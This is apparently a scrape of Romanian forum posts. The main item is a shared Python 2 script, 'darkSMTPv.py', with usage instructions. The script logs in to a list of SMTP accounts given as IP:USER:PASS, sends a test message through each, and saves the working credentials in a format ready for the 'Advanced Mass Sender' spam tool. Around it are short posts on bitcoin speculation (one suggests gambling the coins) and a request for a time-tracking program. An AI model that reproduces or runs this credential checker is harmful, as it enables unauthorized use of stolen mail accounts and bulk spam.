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  1. Renteaza sa cumperi acum btc , dar riscul e foarte mare sa fie in continue scadere si sa ai de pierdut mai mult. Bursele si ele sunt cam in scadere , deci scade si dolarul , deja este 3.8 . Daca v0a ajunge iar la 300$ cum a fost acum 1 luna , faci o afacere .. dar dupa ce ii vinzi ce faci ? Astepti sa scada iar si sa cumperi. Speculezi mult , pierzi mult timp . Sau poti sa ii joci la casino si ii inmultesti. Oricum daca te hotarasti cu bitcoinul .. mai intereseaza-te prin comunitatile de bicoineri ce se aude intai despre moneda si dupa hotaraste-te daca e bine sa investesti acum cand piata e in scadere sau nu.
  2. Closed! Am facut rost de ce avam nevoie! Ms
  3. Salut , am nevoie de cineva care imi poate creea un program pentru contorizarea timpului pe un anume site , am vazut ceva pe internet cateva programe .. dar nu ce am eu nevoie , imi contorizeaza cat este deschis programul , nu perioada cat este el online. nu ma intereseaza timpul task`ului deschis in primplan. Mai multe detalii in mesaj privat.
  4. #!usr/bin/python #darkSMTPv.py #SMTP Checker - using Authentication #Coded by P47r1ck & low1z #----------------------------------- #... To be continued ... # # #THE CODE WILL TAKE A LIST OF SMTP ACCOUNTS IN THE FOLLOWING FORMAT (IP:USER:PASS) WILL TRY TO LOGIN AND THEN SEND AN #EMAIL TO THE ADDRESS THAT YOU CAN CHANGE ANYTIME IN THE CODE ( look below the #Create the message at the toaddr= )[LINE 33] # #EVERY WORKING SMTP ACCOUNT WILL PRINTED ON THE SCREEN WITH THE FOLLOWING MESSAGE : [!] Email Sent Successfully: IP USER PASS # #THE CODE HAS THE FOLLOWING FEATURES. # # 1. IT WILL SAVE THE LIST OF WORKING SMTP ACCOUNTS TO FILE OUTPUT THAT YOU WILL CHOOSE. # 2. YOU CAN ALSO SPECIFY THE EMAIL WHERE THE SMTP CAN SEND THE TEST EMAIL. # 3. IT WILL MAKE A LIST OF SERVERS FOR THE AMS (ADVANCED MASS SENDER PROGRAM), SO YOU CAN INSERT MORE EASIER THE SMTP #LIST INTO THE AMS.INI FILE FROM THE AMS PROGRAM. (LIST IS SAVED TO AMSlist.txt) # # # MORE FEATURES ARE COMING SOON!!! import sys, smtplib, socket, time from smtplib import SMTP socket.setdefaulttimeout(5) # smtp default timeout, change number to speed up large lists def printHelp(): print '\nHow to use it ? There you go -- > ./darkSMTPv.py <accounts> <outputfile>' print '\nImportant: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS\n' # Create the message fromaddr = "thewonderousmailmachine@wtfbbq.net" toaddr = "youremail@account.com" #toaddr = "someone@yahoo.com" message = """To: %s From: %s Subject: SMTP Checker! Online! facem un mic test """ % (toaddr,fromaddr) print "\n _ _ _____ __ __ _______ _____ " print " | | | | / ____| \/ |__ __| __ \ " print " __| | __ _ _ __| | _| (___ | \ / | | | | |__) |_ __" print " / _` |/ _` | '__| |/ /\___ \| |\/| | | | | ___/\ \ / /" print "| (_| | (_| | | | < ____) | | | | | | | | \ V / " print " \__,_|\__,_|_| |_|\_\_____/|_| |_| |_| |_| \_/ \n" print "\n This is not stopping here! ... To be continued." print "More features will be added soon. For bugs p47r1ckro[at]gmail[dot]com\n" print "_______________________________________________________________________" def timer(): now = time.localtime(time.time()) return time.asctime(now) def sendchk(listindex, host, user, password): # seperated function for checking try: smtp = smtplib.SMTP(host) smtp.login(user, password) code = smtp.ehlo()[0] if not (200 <= code <= 299): code = smtp.helo()[0] if not (200 <= code <= 299): raise SMTPHeloError(code, resp) smtp.sendmail(fromaddr, toaddr, message) print "\n\t[!] Email Sent Successfully:",host, user, password print "\t[!] Message Sent Successfully\n" LSstring = host+":"+user+":"+password+"\n" nList.append(LSstring) # special list for AMS file ID's LFile = open(output, "a") LFile.write(LSstring) # save working host/usr/pass to file LFile.close() AMSout = open("AMSlist.txt", "a") AMSout.write("[Server"+str(nList.index(LSstring))+"]\nName="+str(host)+"\nPort=25\nUserID=User\nBccSize=50\nUserName="+str(user)+"\nPassword="+str(password)+"\nAuthType=0\n\n") smtp.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg: print "[-] Login Failed:", host, user, password pass if len(sys.argv) != 3: printHelp() exit(1) # Do not change anything below. accounts = sys.argv[1] output = sys.argv[2] try: handle = list(open(accounts)) except: print"\n[+] We were unable to open the SMTP filelist. Check again your path and try again." print"\n[+] Ciao...." #listindex = 0 nList = [] for line in handle: try: host = line.split(':')[0] user = line.split(':')[1].replace('\n', '') password = line.split(':')[2].replace('\n', '') sendchk(handle.index(line), host, user, password) except: print '\n[+] We have found a error in your accounts list' print host, user print '\n[!] IMPORTANT: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS' print '\n[-] Exiting....\n' exit(1) print "[!] Ended at: " + timer() + "" Mai sus aveti un verifier facut in python e simplu de folosit si nu este virusat! NU este facut de mine! va puneti adresa de email la toaddr = "youremail@account.com" smtpurile sa fie salvate intr-un fisier sub forma ip:user:pass si se verifica asa python verfier.py x x1 x - fiind lista de smtpuri x1 lista unde se salveaza smtpurile bune o sa va faca o lista separat pt AMS doar trebuie sa scrie sus Total servers .....
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